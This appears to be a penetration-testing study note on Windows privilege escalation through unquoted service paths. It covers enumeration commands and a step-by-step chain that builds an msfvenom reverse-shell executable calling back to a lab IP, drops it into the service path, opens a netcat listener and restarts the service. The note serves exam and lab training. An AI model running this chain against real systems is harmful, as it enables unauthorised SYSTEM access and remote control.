// notes/ PrivEsc — Windows
🪟

Service Permissions Unquoted Service Paths

Unquotes service paths is similar to[ binary path exploitation](/windows-privilege-escalation/service-permissions/binary-paths.md), however the vulnerability lays in the fact that…

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/service-permissions_unquoted-service-paths

Unquoted Service Paths

Overview

Unquotes service paths is similar to binary path exploitation, however the vulnerability lays in the fact that the path to the executable is unquoted.

When the service is started Windows looks through every word in the path separated with a space and test .exe

  • C:\Program.exe - NO
  • C:\Program Files.exe - NO
  • C:\Program Files\Unquoted.exe - NO
  • C:\Program Files\Unquoted Path.exe - NO

And so on...

Manual Exploitation

code
01wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
code
01sc.exe qc iobitunsvr

Exploitation via PowerUp

Run PowerUp and search for Unquoted Service Paths section

<figure><img src="/files/ivCVAhU2peQyfOjhMtNc" alt=""><figcaption><p>TCM Windows Priv Esc Try Hack Me</p></figcaption></figure>

Create and drop a malicious executable

bash
$msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe
code
01copy C:\temp\Common.exe C:\Program Files\Unquoted Path Service\Common.exe

Start a listener and the service

bash
$nc -lnvp 1337
code
01sc.exe start unquotedsvc